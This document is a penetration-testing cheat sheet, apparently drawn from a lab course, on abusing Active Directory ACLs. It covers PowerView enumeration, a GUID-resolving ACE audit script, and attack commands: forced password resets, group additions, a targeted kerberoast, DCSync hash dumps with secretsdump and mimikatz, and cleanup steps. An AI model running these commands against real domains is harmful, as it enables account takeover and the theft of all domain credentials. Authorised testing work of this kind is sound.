
Domain ACLs

Tags: GenericAll, GenericWrite, WriteProperty, Self-Membership, ForceChangePassword, WriteOwner, WriteDACL, DS-Replication-Get-Changes, AllExtendedRights, Addself, Add Members, Lateral Movement, Privilege Escalation, Persistence
Overview

Identify

Tool Based

Windows (powerview)

Find-InterestingDomainAcl
local (run from a domain-joined Windows session); lists ACEs where non-default principals hold rights worth abusing
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley
target user wley; resolve the principal to its SID so ACEs can be matched on SecurityIdentifier
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
every ACE in the domain where wley is the trustee, with ObjectType GUIDs resolved to right/attribute names
Note that if PowerView has already been imported, the ActiveDirectory-module cmdlets used in the manual approach below may error. If so, run them from a fresh PowerShell session.

Alternatively, collect with SharpHound and read the same ACEs off the BloodHound graph.

Manually

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
build a list of domain users to check
foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
list the ACEs on each user object where wley is the trustee (the AD: drive path takes the user's distinguished name)

Get-Acl does not resolve GUIDs, so from here we look up each ACE's ObjectType GUID (online, or in the forest's Extended-Rights container and schema) to find the extended right or attribute it covers; for example 00299570-246d-11d0-a768-00aa006e0529 is User-Force-Change-Password.
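The GUID lookup can be automated. The following is an added example, not code from the original notes or from PowerView: it builds the GUID-to-name map from the forest's Extended-Rights container and schema (the same sources PowerView's -ResolveGUIDs reads), then walks the ACL of the domain head plus every user and group object and flags the ACEs held by a chosen principal that map onto the primitives on this page. It assumes the RSAT ActiveDirectory module is installed and reuses the INLANEFREIGHT\wley principal from the page; the function names are mine.

```powershell
# Added example (not from the original notes): resolve Get-Acl ObjectType GUIDs and flag abusable ACEs.
# Assumes the RSAT ActiveDirectory module; principal name taken from the page (INLANEFREIGHT\wley).
Import-Module ActiveDirectory

function Get-AdGuidMap {
    $rootDse = Get-ADRootDSE
    $map = @{}
    # Control access rights (User-Force-Change-Password, DS-Replication-Get-Changes-All, ...) live in
    # CN=Extended-Rights of the configuration NC; the GUID is the rightsGuid attribute, the name is the CN.
    $erBase = "CN=Extended-Rights,$($rootDse.configurationNamingContext)"
    Get-ADObject -SearchBase $erBase -LDAPFilter '(objectClass=controlAccessRight)' -Properties rightsGuid |
        ForEach-Object { $map[[guid]$_.rightsGuid] = $_.Name }
    # Attributes and classes (member, servicePrincipalName, ...) carry schemaIDGUID as a byte array.
    Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' -Properties schemaIDGUID, lDAPDisplayName |
        ForEach-Object { $map[[guid]$_.schemaIDGUID] = $_.lDAPDisplayName }
    return $map
}

function Get-AbusableAce {
    param(
        [Parameter(Mandatory)][string]$Principal,   # e.g. 'INLANEFREIGHT\wley'
        [Parameter(Mandatory)][hashtable]$GuidMap
    )
    # Domain head first (DCSync rights are granted there), then every user (incl. computers) and group.
    $targets = @((Get-ADDomain).DistinguishedName) +
               @(Get-ADObject -LDAPFilter '(|(objectClass=user)(objectClass=group))' | Select-Object -ExpandProperty DistinguishedName)
    foreach ($dn in $targets) {
        $acl = Get-Acl "AD:\$dn"
        foreach ($ace in $acl.Access) {
            if ($ace.IdentityReference.Value -ne $Principal -or $ace.AccessControlType -ne 'Allow') { continue }
            # Empty ObjectType means the right applies to the whole object (e.g. AllExtendedRights).
            $objType = if ($ace.ObjectType -eq [guid]::Empty) { 'All' }
                       elseif ($GuidMap.ContainsKey($ace.ObjectType)) { $GuidMap[$ace.ObjectType] }
                       else { $ace.ObjectType.ToString() }
            $rights = $ace.ActiveDirectoryRights.ToString()
            # Map raw right + object type onto the abuse primitive used on this page.
            $abuse = if ($rights -match 'GenericAll') { 'GenericAll: reset password / add member / set SPN' }
                     elseif ($rights -match 'WriteDacl') { 'WriteDacl: grant yourself any right on the object' }
                     elseif ($rights -match 'WriteOwner') { 'WriteOwner: take ownership, then WriteDacl' }
                     elseif ($rights -match 'ExtendedRight' -and $objType -eq 'All') { 'AllExtendedRights: includes ForceChangePassword and DCSync rights' }
                     elseif ($rights -match 'ExtendedRight' -and $objType -eq 'User-Force-Change-Password') { 'ForceChangePassword: Set-DomainUserPassword' }
                     elseif ($rights -match 'ExtendedRight' -and $objType -like 'DS-Replication-Get-Changes*') { 'DCSync (needs Get-Changes and Get-Changes-All together)' }
                     elseif ($rights -match 'GenericWrite' -or ($rights -match 'WriteProperty' -and $objType -eq 'All')) { 'GenericWrite: set SPN / add member' }
                     elseif ($rights -match 'WriteProperty|Self' -and $objType -eq 'member') { 'Add member to group (WriteProperty/Self on member)' }
                     else { $null }
            if ($abuse) {
                [pscustomobject]@{ Target = $dn; Rights = $rights; ObjectType = $objType; Inherited = $ace.IsInherited; Abuse = $abuse }
            }
        }
    }
}

$guidMap = Get-AdGuidMap
Get-AbusableAce -Principal 'INLANEFREIGHT\wley' -GuidMap $guidMap | Format-Table -AutoSize
```

Walking every object with Get-Acl is slow in a large domain; for a first pass, restrict $targets to the domain head and the groups or users you care about. The output's Inherited column matters for cleanup: an inherited ACE is set on a parent OU, not on the object you are looking at.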

Exploit

Force-Change-Password

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
authenticate as the user you control (wley), who holds ForceChangePassword over damundsen; skip if already running as that user
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
secure string that becomes the target user's new password
Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
reset damundsen's password (no knowledge of the old one is needed with this right)

Add-DomainGroupMember

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
authenticate as damundsen (the password we just set); $Cred2 is reused for the rest of the chain; skip if already logged in as that user
Import-Module .\PowerView.ps1
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
add damundsen to the group using the Add Members / Self-Membership right (WriteProperty or Self on the member attribute)
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
confirm the new membership

GenericAll

Targeted kerberoast

Import-Module .\PowerView.ps1
Set-DomainObject -Credential $Cred2 -Identity adunn -Set @{serviceprincipalname='notahacker/LEGIT'} -Verbose
set a fake SPN on adunn; GenericAll lets us write any attribute, so the account becomes Kerberoastable
.\Rubeus.exe kerberoast /user:adunn /nowrap
request a TGS for that SPN and crack the hash offline (the group membership added above must be in effect, so use a fresh logon as damundsen)

Add user to domain admins

net group "domain admins" <user> /add /domain
run from a session as a principal that holds GenericAll (or WriteProperty on member) over the Domain Admins group; GenericAll over a user object does not by itself grant this

DS-Replication-Get-Changes-All

From linux

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5
remote (Impacket, from a Linux host): pulls every domain account's hashes over DRSUAPI replication, which is what the DS-Replication-Get-Changes and Get-Changes-All rights allow

From windows

runas /netonly /user:INLANEFREIGHT\adunn powershell
local: open a shell whose network authentication is adunn (the account holding the replication rights)
.\mimikatz.exe
privilege::debug
not required for DCSync itself (the rights live on the domain object, not on the local host), but harmless
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
replicate a single account's secrets; omit /user for a full dump

Cleanup considerations

The password reset on damundsen cannot be reverted, since the original password was never known; record it in the report so the account can be reset by the client.

Removing the Fake SPN from adunn's Account

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

Removing damundsen from the Help Desk Level 1 Group

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

Confirming damundsen was Removed from the Group

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName | ? {$_.MemberName -eq 'damundsen'}
no output means the membership is gone